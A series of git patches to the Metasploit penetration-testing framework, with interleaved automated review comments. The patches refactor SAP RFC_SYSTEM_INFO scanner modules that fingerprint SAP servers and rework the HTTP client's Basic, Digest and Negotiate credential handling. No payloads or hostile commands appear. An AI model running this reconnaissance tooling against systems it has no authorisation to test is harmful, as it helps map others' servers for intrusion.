'rfcipv6addr') - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :sname => 'sap', - :type => 'sap.version.rfc_log', - :data => "RFC Log 
Version: #{rfcproto}" - ) if not rfcproto.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :sname => 'sap', - :type => 'sap.version.kernel', - :data => "Kernel Release: #{rfckernrl}" - ) if not rfckernrl.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :sname => 'sap', - :type => 'system.os', - :data => "Operating System: #{rfcopsys}" - ) if not rfcopsys.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.db.hostname', - :data => "Database Host: #{rfcdbhost}" - ) if not rfcdbhost.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.db_system', - :data => "Central Database System: #{rfcdbsys}" - ) if not rfcdbsys.empty? + # report notes / create saptbl output + report_note_sap('sap.version.release','Release Status of SAP System: ',rfcsaprl) if rfcsaprl + report_note_sap('sap.version.rfc_log','RFC Log Version: ',rfcproto) if rfcproto + report_note_sap('sap.version.kernel','Kernel Release: ',rfckernrl) if rfckernrl + report_note_sap('system.os','Operating System: ',rfcopsys) if rfcopsys + report_note_sap('sap.db.hostname','Database Host: ',rfcdbhost) if rfcdbhost + report_note_sap('sap.db_system','Central Database System: ',rfcdbsys) if rfcdbsys + report_note_sap('system.hostname','Hostname: ',rfchost) if rfchost + report_note_sap('system.ip.v4','IPv4 Address: ',rfcipaddr) if rfcipaddr + report_note_sap('system.ip.v6','IPv6 Address: ',rfcipv6addr) if rfcipv6addr + report_note_sap('sap.instance','System ID: ',rfcsysid) if rfcsysid + report_note_sap('sap.rfc.destination','RFC Destination: ',rfcdest) if rfcdest + report_note_sap('system.timezone','Timezone (diff from UTC in seconds): ',rfctzone.gsub(/\s+/, "")) if rfctzone + report_note_sap('system.charset','Character Set: ',rfcchartyp) if rfcchartyp + report_note_sap('sap.daylight_saving_time','Daylight Saving Time: ',rfcdayst) if rfcdayst + report_note_sap('sap.machine_id','Machine 
ID: ',rfcmach.gsub(/\s+/,"")) if rfcmach if rfcinttyp == 'LIT' - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.endianness', - :data => "Integer Format: Little Endian" - ) - elsif not rfcinttyp.empty? - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.endianness', - :data => "Integer Format: Big Endian" - ) + report_note_sap('system.endianness','Integer Format: ', 'Little Endian') + elsif rfcinttyp + report_note_sap('system.endianness','Integer Format: ', 'Big Endian') end - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.hostname', - :data => "Hostname: #{rfchost}" - ) if not rfchost.empty? - if rfcflotyp == 'IE3' - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.float_type', - :data => "Float Type Format: IEEE" - ) - elsif not rfcflotyp.empty? - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.float_type', - :data => "Float Type Format: IBM/370" - ) + report_note_sap('system.float_type','Float Type Format: ', 'IEEE') + elsif rfcflotyp + report_note_sap('system.float_type','Float Type Format: ', 'IBM/370') end - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.ip.v4', - :data => "IPv4 Address: #{rfcipaddr}" - ) if not rfcipaddr.empty? + # output table + print(@saptbl.to_s) - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.ip.v6', - :data => "IPv6 Address: #{rfcipv6addr}" - ) if not rfcipv6addr.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.instance', - :data => "System ID: #{rfcsysid}" - ) if not rfcsysid.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.rfc.destination', - :data => "RFC Destination: #{rfcdest}" - ) if not rfcdest.empty? 
- - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.timezone', - :data => "Timezone: #{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" - ) if not rfctzone.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.charset', - :data => "Character Set: #{rfcchartyp}" - ) if not rfcchartyp.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.daylight_saving_time', - :data => "Daylight Saving Time: #{rfcdayst}" - ) if not rfcdayst.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.machine_id', - :data => "Machine ID: #{rfcmach.gsub(/\s+/, "")}" - ) if not rfcmach.empty? end end From f3cf8ad1b9e72a1e63d10d83bc1f5b8ca6e7b3aa Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Tue, 19 Feb 2013 11:13:33 +0100 Subject: [PATCH 024/139] Whitespace EOL --- modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb index 6679e13e44..ad808d5c43 100644 --- a/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb @@ -62,7 +62,7 @@ class Metasploit4 < Msf::Auxiliary :host => rhost, :port => rport, :proto => 'tcp', - :sname => 'sap', + :sname => 'sap', :type => type, :data => data + value ) if data diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 808695293b..7bece972d3 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb 
@@ -66,7 +66,7 @@ class Metasploit4 < Msf::Auxiliary :host => rhost, :port => rport, :proto => 'tcp', - :sname => 'sap', + :sname => 'sap', :type => type, :data => data + value ) if data From 358b2f578380ffc011b0661bf0ec43243a2cf52a Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Tue, 19 Feb 2013 11:15:04 +0100 Subject: [PATCH 025/139] Added module credit as this has turned into a rewrite ;) --- modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 7bece972d3..8408a4ae1d 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -40,7 +40,8 @@ class Metasploit4 < Msf::Auxiliary 'Author' => [ 'Agnivesh Sathasivam', - 'nmonkee' + 'nmonkee', + 'ChrisJohnRiley' # module cleanup / streamlining ], 'License' => MSF_LICENSE ) From d49797267e2f068f68a63c51c47370165570070c Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Tue, 19 Feb 2013 11:20:49 +0100 Subject: [PATCH 026/139] Correct SAP Table Name --- modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 8408a4ae1d..1ec8aee729 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -122,7 +122,7 @@ class Metasploit4 < Msf::Auxiliary # create table for output @saptbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default, - 'Header' => "[SAP] ICF RFC_SYSTEM_INFO", + 'Header' => "[SAP] SOAP RFC_SYSTEM_INFO", 'Prefix' => "\n", 'Postfix' => "\n", 'Indent' => 1, From 0662677a72a2223eb295550cd6022e52436658f3 Mon Sep 17 00:00:00 2001 
From: David Maloney Date: Tue, 19 Feb 2013 17:19:16 -0600 Subject: [PATCH 027/139] First minor cleanup sweep --- lib/rex/proto/http/client.rb | 80 +++++++++++++--------------- lib/rex/proto/http/client_request.rb | 2 +- 2 files changed, 38 insertions(+), 44 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 0244a9eb3e..13d36d91c0 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -169,27 +169,28 @@ class Client # # @return [Request] def request_raw(opts={}) - opts['agent'] ||= config['agent'] - opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' - opts['data'] ||= '' - opts['uri'] ||= '/' - opts['cookie'] ||= config['cookie'] - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['vhost'] ||= config['vhost'] - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['version'] = opts['version'] || config['version'] || '1.1' - opts['cgi'] = false - opts['port'] = self.port + opts['agent'] ||= config['agent'] + opts['data'] ||= '' + opts['uri'] ||= '/' + opts['cookie'] ||= config['cookie'] + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['vhost'] ||= config['vhost'] + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + + opts['cgi'] = false + opts['port'] = self.port + opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' + opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' + opts['version'] = opts['version'] || config['version'] || '1.1' if opts['basic_auth'] and not opts['authorization'] opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - req = ClientRequest.new(opts,self.config) + req = ClientRequest.new(self.config,opts) end 
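Review bot: `opts['basic_auth']` is defaulted to `''` a few lines above the `if opts['basic_auth'] and not opts['authorization']` check, and an empty string is truthy in Ruby, so `opts['authorization']` is set to `Rex::Text.encode_base64('')` on every request with no credentials configured; whether an empty `Authorization` header is then emitted depends on ClientRequest, which is outside this diff, but the guard should be `if !opts['basic_auth'].empty? and not opts['authorization']`. `opts['headers'] ||= config['headers'] || {}` makes the per-request headers hash an alias of the client's shared config hash, so anything later written into `opts['headers']` (see `send_auth` on L96) persists in the client for subsequent requests; `opts['headers'] ||= (config['headers'] || {}).dup` keeps requests isolated. Both points apply equally to the `request_cgi` hunk on L94.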
@@ -205,24 +206,25 @@ class Client # # @return [Request] def request_cgi(opts={}) - opts['agent'] ||= config['agent'] - opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' - opts['data'] ||= '' - opts['uri'] ||= '/' - opts['cookie'] ||= config['cookie'] - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['vhost'] ||= config['vhost'] - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['ctype'] ||= 'application/x-www-form-urlencoded' - opts['vars_get'] ||= {} - opts['vars_post'] ||= {} - opts['version'] = opts['version'] || config['version'] || '1.1' - opts['cgi'] = true - opts['port'] = self.port + opts['agent'] ||= config['agent'] + opts['data'] ||= '' + opts['uri'] ||= '/' + opts['cookie'] ||= config['cookie'] + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['vhost'] ||= config['vhost'] + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + opts['ctype'] ||= 'application/x-www-form-urlencoded' + opts['vars_get'] ||= {} + opts['vars_post'] ||= {} + + opts['cgi'] = true + opts['port'] = self.port + opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' + opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' + opts['version'] = opts['version'] || config['version'] || '1.1' if opts['encode_params'] == true or opts['encode_params'].nil? opts['encode_params'] = true @@ -234,7 +236,7 @@ class Client opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - req = ClientRequest.new(opts,self.config) + req = ClientRequest.new(self.config,opts) end # @@ -396,7 +398,6 @@ class Client # We do persist the rest of the connection stream because Digest is a tcp session # based authentication method. # - def digest_auth(opts={}) @nonce_count = 0 
@@ -753,13 +754,6 @@ class Client pipeline end - # - # Return the Authorization basic-auth header - # - def set_basic_auth_header(auth) - auth ? set_formatted_header("Authorization", "Basic " + Rex::Text.encode_base64(auth)) : "" - end - # # The client request configuration # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index c24d9a8c4a..8af865bde1 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -34,7 +34,7 @@ class ClientRequest attr_reader :opts - def initialize(opts={}, client_config) + def initialize(client_config,opts={}) @cgi = opts['cgi'] @config = client_config @connection = opts['connection'] From a4905e43a2ebcabf8d8f3ef82f9964c09797a4c8 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 18:40:39 -0600 Subject: [PATCH 028/139] Fix the way creds are passed + YARD some ayrddocs on send_auth plus fix the wierd way i was passing creds around --- lib/rex/proto/http/client.rb | 36 +++++++++++++++++------------------- 1 file changed, 17 insertions(+), 19 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 13d36d91c0..66a4780618 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -319,6 +319,7 @@ class Client # # @param req [Request,#to_s] The request to send # @param t (see #connect) + # def send_request(req, t = -1) connect(t) conn.put(req.to_s) 
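Review bot: Swapping the positional order to `initialize(client_config,opts={})` is a silent break for any caller outside this diff that still passes `(opts, config)`: both arguments are hashes, so nothing fails at the call site and the request simply gets its config and options crossed. The commit updates its own `request_raw`/`request_cgi` call sites on L93/L94, but no other `ClientRequest.new(` caller is visible here, so that should be confirmed before merging. Making `client_config` a keyword argument would turn a stale caller into an immediate ArgumentError instead of a subtly wrong request.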
@@ -329,31 +330,29 @@ class Client !(self.username.nil?) && self.username != '' end - # - # Params - - # res = The 401 response we need to auth from - # opts = the opts used to generate the request that created this response - # t = the timeout for the http requests - # persist = whether to persist the tcp connection for HTTP Pipelining - # - # Parses the response for what Authentication methods are supported. - # Sets the corect authorization options and passes them on to the correct - # method for sending the next request. + # Resends an HTTP Request with the propper authentcation headers + # set. If we do not support the authentication type the server requires + # we return the original response object + # @param res [Response] the HTTP Response object + # @param opts [Hash] the options used to generate the original HTTP request + # @param t [Fixnum] the timeout for the request in seconds + # @param persist [Boolean] whether or not to persist the TCP connection (pipelining) + # @return [Response] the last valid HTTP response object we received def send_auth(res, opts, t, persist) + opts['username'] ||= self.username + opts['password'] ||= self.password supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' if opts['headers'] - opts['headers']['Authorization'] = basic_auth_header(self.username,self.password) + opts['headers']['Authorization'] = basic_auth_header(username,password) else - opts['headers'] = { 'Authorization' => basic_auth_header(self.username,self.password)} + opts['headers'] = { 'Authorization' => basic_auth_header(username,password)} end req = request_cgi(opts) res = _send_recv(req,t,persist) return res elsif supported_auths.include? "Digest" - opts['DigestAuthUser'] = self.username.to_s - opts['DigestAuthPassword'] = self.password.to_s temp_response = digest_auth(opts) if temp_response.kind_of? Rex::Proto::Http::Response res = temp_response 
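Review bot: `supported_auths = res.headers['WWW-Authenticate']` is used with `include?` unguarded, so a 401 without that header raises NoMethodError instead of honouring the new docstring's "return the original response" contract; `supported_auths = res.headers['WWW-Authenticate'].to_s` (or `return res unless supported_auths`) fixes that. The Basic branch writes into `opts['headers']`, which `request_cgi` may have aliased to the client's shared `config['headers']`, so the Authorization header would persist for every later request on this client; `opts['headers'] = (opts['headers'] || {}).merge('Authorization' => basic_auth_header(opts['username'], opts['password']))` isolates it and also uses the `opts['username']`/`opts['password']` the two added lines populate — as written the Basic path ignores them and reads `username`/`password` directly while `digest_auth` (L97) reads the opts keys. When a server advertises both, `include? 'Basic'` is tested first; checking Digest before Basic would avoid sending directly reusable credentials when a challenge-based scheme is on offer.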
@@ -403,8 +402,8 @@ class Client to = opts['timeout'] || 20 - digest_user = opts['DigestAuthUser'] || "" - digest_password = opts['DigestAuthPassword'] || "" + digest_user = opts['username'] || "" + digest_password = opts['password'] || "" method = opts['method'] path = opts['uri'] @@ -539,7 +538,6 @@ class Client # Builds a series of requests to complete Negotiate Auth. Works essentially # the same way as Digest auth. Same pipelining concerns exist. # - def negotiate_auth(opts={}) ntlm_options = { :signing => false, @@ -550,8 +548,8 @@ class Client } to = opts['timeout'] || 20 - opts['username'] ||= self.username.to_s - opts['password'] ||= self.password.to_s + opts['username'] ||= '' + opts['password'] ||= '' if opts['provider'] and opts['provider'].include? 'Negotiate' provider = "Negotiate " From de4234f0adfe877ede4d7d816f21ece5e6004cb8 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 18:48:03 -0600 Subject: [PATCH 029/139] Some more YARD docs --- lib/rex/proto/http/client.rb | 17 +++-------------- 1 file changed, 3 insertions(+), 14 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 66a4780618..132c7cdaf0 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb 
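Review bot: In the negotiate_auth hunk (`@@ -550,8 +548,8 @@`), `opts['username'] ||= ''` replaces a fallback to `self.username.to_s`, so a direct call to negotiate_auth without credentials in `opts` now authenticates with an empty user even when the client was constructed with one; the fallback exists only in send_auth (`opts['username'] ||= self.username` in the previous hunk set). If negotiate_auth is meant to be reached only through send_auth, state that in its comment; otherwise keep `opts['username'] ||= self.username.to_s` and `opts['password'] ||= self.password.to_s`. The digest_auth hunk (`@@ -403,8 +402,8 @@`) reads `opts['username'] || ""` and is consistent with the seeding in send_auth. negotiate_auth's body continues outside the hunk.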
@@ -383,20 +383,9 @@ class Client auth_str = "Basic " + Rex::Text.encode_base64(auth_str) end - - # - # Opts - - # Inherits all the same options as send_request_cgi - # Also expects some specific opts - # DigestAuthUser - The username for DigestAuth - # DigestAuthPass - The password for DigestAuth - # DigestAuthIIS - IIS uses a slighlty different implementation, set this for IIS support - # - # This method builds new request to complete a Digest Authentication cycle. - # We do not persist the original connection , to clear state in preparation for our auth - # We do persist the rest of the connection stream because Digest is a tcp session - # based authentication method. - # + # Send a series of requests to complete Digest Authentication + # @param opts [Hash] the options used to build an HTTP request + # @return [Response] the last valid HTTP response we received def digest_auth(opts={}) @nonce_count = 0 From dac11474735f77b1b301a6ef5a6d01643f5ee30e Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 19:41:42 -0600 Subject: [PATCH 030/139] merge client config into opts --- lib/rex/proto/http/client.rb | 8 ++++++-- lib/rex/proto/http/client_request.rb | 4 ++-- 2 files changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 132c7cdaf0..46bfffcc86 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -186,11 +186,13 @@ class Client opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' opts['version'] = opts['version'] || config['version'] || '1.1' + opts['client_config'] = self.config + if opts['basic_auth'] and not opts['authorization'] opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - req = ClientRequest.new(self.config,opts) + req = ClientRequest.new(opts) end 
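Review bot: The YARD rewrite for digest_auth (`@@ -383,20 +383,9 @@`) drops two statements the removed comment made: that `DigestAuthIIS` is an option digest_auth honours, and that the original connection is not persisted while the rest of the Digest exchange is pipelined on one TCP session. digest_auth's body is outside the hunk, so I cannot confirm whether it still reads `opts['DigestAuthIIS']` or takes it from the client config (patch 031 later passes `'DigestAuthIIS'` via the config hash); whichever it is, document it, e.g. `# @option opts [Boolean] 'DigestAuthIIS' conform to IIS's Digest implementation (default true in the HttpClient mixin)`. The persistence note is worth keeping as a one-line `@note`, since it explains why the auth sequence is not safe to interleave with other requests on the same connection.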
@@ -226,6 +228,8 @@ class Client opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' opts['version'] = opts['version'] || config['version'] || '1.1' + opts['client_config'] = self.config + if opts['encode_params'] == true or opts['encode_params'].nil? opts['encode_params'] = true else @@ -236,7 +240,7 @@ class Client opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - req = ClientRequest.new(self.config,opts) + req = ClientRequest.new(opts) end # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 8af865bde1..9c87834499 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -34,9 +34,9 @@ class ClientRequest attr_reader :opts - def initialize(client_config,opts={}) + def initialize(opts={}) @cgi = opts['cgi'] - @config = client_config + @config = opts['client_config'] @connection = opts['connection'] @content_type = opts['ctype'] @cookie = opts['cookie'] From b2563dd6c27a06123be1c341003f1093175b7dc6 Mon Sep 17 00:00:00 2001 
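Review bot: In the client_request.rb hunk (`@@ -34,9 +34,9 @@`), `@config = opts['client_config']` makes the request's configuration one more string key in the caller-supplied options hash, so a `ClientRequest.new(opts)` that lacks `'client_config'` gets `@config = nil` and fails later, wherever `@config` is first indexed (outside this hunk), instead of at construction. `@config = opts.fetch('client_config')` fails fast with a KeyError naming the missing key; if a config-less request is meant to be legal, `opts['client_config'] || {}` is the alternative. The two producers in lib/rex/proto/http/client.rb (the request_raw and request_cgi hunks in this patch) set the key unconditionally, so only other `ClientRequest.new` callers are affected.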
From: David Maloney Date: Tue, 19 Feb 2013 21:25:37 -0600 Subject: [PATCH 031/139] trying to clean up the mess from the revert --- lib/anemone/rex_http.rb | 4 +- .../1.9.1/gems/method_source-0.7.1/.gemtest | 0 .../gems/method_source-0.7.1/.travis.yml | 17 -- .../1.9.1/gems/method_source-0.7.1/.yardopts | 1 - .../1.9.1/gems/method_source-0.7.1/Gemfile | 2 - .../1.9.1/gems/method_source-0.7.1/LICENSE | 25 -- .../gems/method_source-0.7.1/README.markdown | 91 ------ .../1.9.1/gems/method_source-0.7.1/Rakefile | 76 ----- .../method_source-0.7.1/lib/method_source.rb | 163 ----------- .../lib/method_source/source_location.rb | 138 --------- .../lib/method_source/version.rb | 3 - .../method_source-0.7.1/method_source.gemspec | 33 --- .../gems/method_source-0.7.1/test/test.rb | 122 -------- .../method_source-0.7.1/test/test_helper.rb | 50 ---- lib/msf/core/auxiliary/crawler.rb | 14 +- lib/msf/core/auxiliary/web/http.rb | 13 +- lib/msf/core/exploit/http/client.rb | 265 ++---------------- lib/rex/proto/http/client.rb | 28 +- 18 files changed, 65 insertions(+), 980 deletions(-) delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb delete mode 100644 
lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb diff --git a/lib/anemone/rex_http.rb b/lib/anemone/rex_http.rb index ce6a71a17f..f606f289fc 100644 --- a/lib/anemone/rex_http.rb +++ b/lib/anemone/rex_http.rb @@ -188,7 +188,9 @@ module Anemone context, url.scheme == "https", 'SSLv23', - @opts[:proxies] + @opts[:proxies], + @opts[:username], + @opts[:password] ) conn.set_config( diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest deleted file mode 100644 index e69de29bb2..0000000000 diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml deleted file mode 100644 index ba51bba6b2..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml +++ /dev/null @@ -1,17 +0,0 @@ -rvm: - - 1.8.7 - - 1.9.2 - - 1.9.3 - - ree - - rbx-18mode - - rbx-19mode - - jruby - -notifications: - irc: "irc.freenode.org#pry" - recipients: - - jrmair@gmail.com - -branches: - only: - - master diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts deleted file mode 100644 index a4e7838016..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts +++ /dev/null @@ -1 +0,0 @@ --m markdown diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile deleted file mode 100644 index e45e65f871..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile +++ /dev/null @@ -1,2 +0,0 @@ -source :rubygems -gemspec 
diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE deleted file mode 100644 index d1a50d62d0..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE +++ /dev/null @@ -1,25 +0,0 @@ -License -------- - -(The MIT License) - -Copyright (c) 2011 John Mair (banisterfiend) - -Permission is hereby granted, free of charge, to any person obtaining -a copy of this software and associated documentation files (the -'Software'), to deal in the Software without restriction, including -without limitation the rights to use, copy, modify, merge, publish, -distribute, sublicense, and/or sell copies of the Software, and to -permit persons to whom the Software is furnished to do so, subject to -the following conditions: - -The above copyright notice and this permission notice shall be -included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, -EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. -IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY -CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, -TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE -SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown deleted file mode 100644 index d91b810a3b..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown +++ /dev/null 
@@ -1,91 +0,0 @@ -method_source -============= - -(C) John Mair (banisterfiend) 2011 - -_retrieve the sourcecode for a method_ - -*NOTE:* This simply utilizes `Method#source_location`; it - does not access the live AST. - -`method_source` is a utility to return a method's sourcecode as a -Ruby string. Also returns `Proc` and `Lambda` sourcecode. - -Method comments can also be extracted using the `comment` method. - -It is written in pure Ruby (no C). - -* Some Ruby 1.8 support now available. -* Support for MRI, RBX, JRuby, REE - -`method_source` provides the `source` and `comment` methods to the `Method` and -`UnboundMethod` and `Proc` classes. - -* Install the [gem](https://rubygems.org/gems/method_source): `gem install method_source` -* Read the [documentation](http://rdoc.info/github/banister/method_source/master/file/README.markdown) -* See the [source code](http://github.com/banister/method_source) - -Example: display method source ------------------------------- - - Set.instance_method(:merge).source.display - # => - def merge(enum) - if enum.instance_of?(self.class) - @hash.update(enum.instance_variable_get(:@hash)) - else - do_with_enum(enum) { |o| add(o) } - end - - self - end - -Example: display method comments --------------------------------- - - Set.instance_method(:merge).comment.display - # => - # Merges the elements of the given enumerable object to the set and - # returns self. - -Limitations: ------------- - -* Occasional strange behaviour in Ruby 1.8 -* Cannot return source for C methods. -* Cannot return source for dynamically defined methods. - -Special Thanks --------------- - -[Adam Sanderson](https://github.com/adamsanderson) for `comment` functionality. - -[Dmitry Elastic](https://github.com/dmitryelastic) for the brilliant Ruby 1.8 `source_location` hack. - -[Samuel Kadolph](https://github.com/samuelkadolph) for the JRuby 1.8 `source_location`. 
